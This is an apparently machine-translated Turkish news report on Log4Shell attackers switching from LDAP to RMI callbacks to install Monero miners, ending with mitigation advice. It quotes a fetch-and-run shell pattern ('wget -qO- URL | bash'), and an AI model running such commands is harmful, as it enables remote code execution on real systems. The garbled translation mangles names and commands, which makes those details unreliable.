LOG4J saldırganlar Monero madencilerini RMI üzerinden enjekte etmek için geçer

4 yıl önce

APACHE LOG4J güvenlik açığını sömüren bazı tehdit aktörleri, LDAP geri arama URL'lerinden RMI'ye geçti, hatta maksimum başarı şansı için tek bir istekle kullandı.

Bu vardiya devam eden saldırıda kayda değer bir gelişmedir ve savunucunun tüm potansiyel vektörleri güvence altına almaya çalışırken farkında olmaları gerekir.

Şimdilik, bu eğilim, Monero madenciliği için kaynakları kaçırmak için arayan tehdit aktörleri tarafından gözlendi, ancak diğerleri herhangi bir zamanda benimseyebilir.

LOG4J "LOG4SHELL" güvenlik açığını hedef alan çoğu saldırı LDAP (Hafif Dizin Erişim Protokolü) servisi geçti.

RMI'ye (Remote yöntem çağrısı) API, bu mekanizmanın ek çek ve kısıtlamalara maruz kaldığı düşünüldüğünde, ilk başta karşı sezgisel görünüyor, ancak bu her zaman böyle değil.

Bazı JVM (Java Sanal Makinesi) sürümleri, katı politikalar içermez ve bu nedenle RMI, Bazen RCE (uzak kod yürütme), LDAP'den daha zahmetsiz bir kanal olabilir.

Ayrıca, LDAP talepleri artık enfeksiyon zincirinin bir parçası olarak katılaşmış ve savunucular tarafından daha sıkı bir şekilde izlenir.

Örneğin, birçok IDS / IPS araçları şu anda JNDI ve LDAP ile istekleri filtreliyor, bu yüzden RMI'nin bu noktada göz ardı edilebileceği bir şans var.

Bazı durumlarda, ardıç, aynı HTTP sonrası isteğinde hem RMI hem de LDAP hizmetlerini gördü.

Bununla birlikte, log4shell kırılganlığını kötüye kullanmaya çalışan tüm aktörler için, hedef aynı kalır - güvenlik açığı log4j sunucusu tarafından işlenecek bir istismar dizesi göndererek, hedefte kod yürütülmesine yol açar.

Yukarıdaki saldırı, bir bash kabuğunun uzak bir sunucudan bir kabuk komut dosyasını indirmelerine neden olur.

"Bu kod, JavaScript komut dosyası motoruyla bir bash kabuk komutunu çağırır," $ @ @ | Bash "indirilen komut dosyasını yürütmek için" $ @ | Bash "i'yi çalıştırır" dedi.

"Bu komutun yürütülmesi sırasında, bash Shell, saldırganın komutlarını başka bir bash sürecine kadar borular:" WGET -QO-URL | Bash ", hedef makinenin bir kabuk komut dosyasını indirir ve yürütür."

Ardıç Laboratuarları tarafından görülen saldırılarda, tehdit aktörleri, uzlaşmış sunucularda Monero Madenciliği ile ilgileniyor ve "başkalarına zarar vermeyecek" neredeyse masum bir aktivite olarak sunuyor.

Miner, X84_64 Linux sistemlerini hedefler ve Cron alt sistemi aracılığıyla kalıcılık ekler.

Şimdiye kadarki olan saldırıların çoğu, Linux sistemlerini hedef almış olsa da, kontrol noktası, analistlerinin, 'Steeffloader' olarak adlandırılan, log4shell'i kaldıran ilk Win32 çalıştırılabilirini keşfettiğini bildirdi.

Son tarihteki en etkilenmiş güvenlik açıklarından biri haline geldiklerine karşı savunmanın tek uygulanabilir yolu, LOG4J'yi 2.16.0 sürümüne yükseltmektir.

Ek olarak, Yöneticiler, yeni sürüm duyuruları için Apache'nin güvenlik bölümüne yakın bir göz tutmalı ve hemen uygulamalıdır.

Azaltma rehberliği ve teknik bilgi kaynakları için CISA'nın log4shell'in ayrıntılı sayfasını kontrol edin.

CVE-2021-44228'den etkilenen kapsamlı bir ürün listesi var ve bu GitHub deposu üzerinde sürekli olarak tedarik edilen tavsiyeli bir liste sürekli güncellenmektedir.

Son olarak, sistemlerinizde şüpheli aktiviteyi fark ederseniz, hasarı içermek ve durumu iyileştirmek için ateşli bir şekilde çalışan FBI veya CISA'ya bildirmeyi düşünün.

LOG4J: Korunmasız ürünlerin ve satıcı danışmanlarının listesi

Hackerlar, dünya çapında log4shell saldırılarında kötü amaçlı yazılımları bastırmaya başlar

Araştırmacılar, kritik log4shell güvenlik açığı için 'aşı' yayınladı

Yeni Ransomware şimdi log4shell saldırılarında konuşlandırıldı

LOG4J Güvenlik Açığı şimdi devlet destekli bilgisayar korsanları tarafından kullanılan, erişim brokerları tarafından kullanılır.

Kaynak: Bleeping Computer

More Posts